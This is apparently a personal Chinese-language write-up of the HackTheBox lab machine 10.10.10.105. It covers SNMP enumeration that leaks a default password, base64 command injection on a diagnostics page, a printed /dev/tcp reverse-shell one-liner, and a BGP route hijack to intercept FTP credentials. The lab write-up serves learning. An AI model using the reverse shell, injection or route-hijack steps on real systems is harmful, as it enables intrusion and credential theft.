真的是在HTB上面碰到的最复杂的一个机器了,不禁感叹技术没有边界,我也仅仅接触了一点点。
Target IP:10.10.10.105
信息搜集
nmap
照例开局扫端口
发现ssh和http开放,而ftp端口filtered,暂时不清楚情况。
继续访问http服务,发现一个登录页面Lyghtspeed
试了试弱口令以及万能密码,并没有什么效果,继续尝试目录扫描
gobuster
里面的几个目录比较值得注意,分别是
/doc,/tools,/debug/tools里面只有一个remote.php,点开后没什么可注意的,就是提示了一下License过期。
/debug里面是一个phpinfo界面
/doc里面有两个文件其中一个网络拓扑图,目前看来也没什么用
还有个文档,文档中的错误码值得注意
回想登录界面有错误提示,可以知道登录面板的用户名和密码还是初始化状态,但是具体初始化的用户名和密码到底是什么还不清楚,根据文档中的提示是和序列号有关。
到此发现好像又没什么思路了。。。
nmap udp扫描
无奈再查了查相关walkthrough,发现他们还进行了udp扫描
161端口开放了snmp
利用snmpwalk连接161端口,看看有没有什么消息
看到了一串字符串,刚开始没什么反应,后来想想这
SN#不就是serial number的意思。。尝试利用
admin:NET_45JDX23登录80端口的服务,登录成功
尝试获取user.txt
Diagnostics页面十分值得注意
看起来是
ps aux | grep `echo $input | base64 -d`这样形式的一个系统指令,因此可以尝试抓包进行命令执行尝试执行
ls
发现指令成功执行,这时感觉距离成功非常近了(too young too simple)
利用
/bin/sh -i > /dev/tcp/ip/port 0<&1 2>&1进行反弹shell,成功获取到shell,读到user.txt
获取root.txt
进去后,感觉还挺奇怪的,因为普通的HTB机器应该不会直接给root权限,而是需要通过某种方式进行一个提权操作,然后读到root目录里面的root.txt
但是这台机器直接给了root权限,而且找不到root.txt
根据之前翻到的那个截图,感觉可能需要在内网进行一次横向转移
先翻看了.ssh目录,看看有没有什么可以登录的服务器
known_hosts被加密了,这时候利用网上搜来的工具对known_hosts里面存在的ip进行爆破。
获取到了两个IP
10.120.15.10
10.99.64.2
尝试ssh直接免密登录,并不能成功
传个nmap上去,扫一下端口试试
看到ftp开着,匿名登录进去毫无斩获,此时又失了头绪。
再经过walkthrough点拨,才悟到,整个系统是一个bgp网络,不同的设备部署在不同的ISP内部。
根据网站上ticket中6号介绍,可能需要从10.120.15.10的ftp服务中获取一定的信息。
6 Closed Rx / CastCom. IP Engineering team from one of our upstream ISP called to report a problem with some of their routes being leaked again due to a misconfiguration on our end. Update 2018/06/13: Pb solved: Junior Net Engineer Mike D. was terminated yesterday. Updated: 2018/06/15: CastCom. still reporting issues with 3 networks: 10.120.15,10.120.16,10.120.17/24's, one of their VIP is having issues connecting by FTP to an important server in the 10.120.15.0/24 network, investigating... Updated 2018/06/16: No prbl. found, suspect they had stuck routes after the leak and cleared them manually.
BGP劫持
所以攻击思路就有了,利用BGP劫持,把访问10.120.15.10的ftp流量接收过来,看看能发现点什么
先配置BGP:r1上面利用vtysh进行路由配置
配路由器可是老本行了。敲出
conf t的时候扑面而来一股熟悉的味道。配置
network 10.250.15.0/25的意思是声明10.250.15.0/25这个网络在我的服务中,这样就会在边界路由交换BGP信息后,选择把10.250.15.0/25的ip传给我这台路由器而不是AS300此时还要把和AS300相连的eth2断掉,IP地址改成我们所需要的伪装的IP,然后监听21端口
顺利地获取到了登录10.120.15.10这台机器的ftp口令
然后只需要用它登录ftp或者ssh就可以了(二者均可)
登录前记得把整个网络恢复(包括BGP设定和eth2网卡设置),不然不能访问这台机器
最终获取到root.txt的内容
总结
今天这个机器是目前来说做过的最耗时耗力的一个,但是真的物有所值。
不仅温习了一边配路由器的知识,期间我还因为ftp服务器的缘故纠结了好多错误的东西。
还是希望以后能更少看walkthrough,全凭自己的能力。
另外希望不久后能有勇气看看HTB的难题,而不是继续在中级题里面划水。。
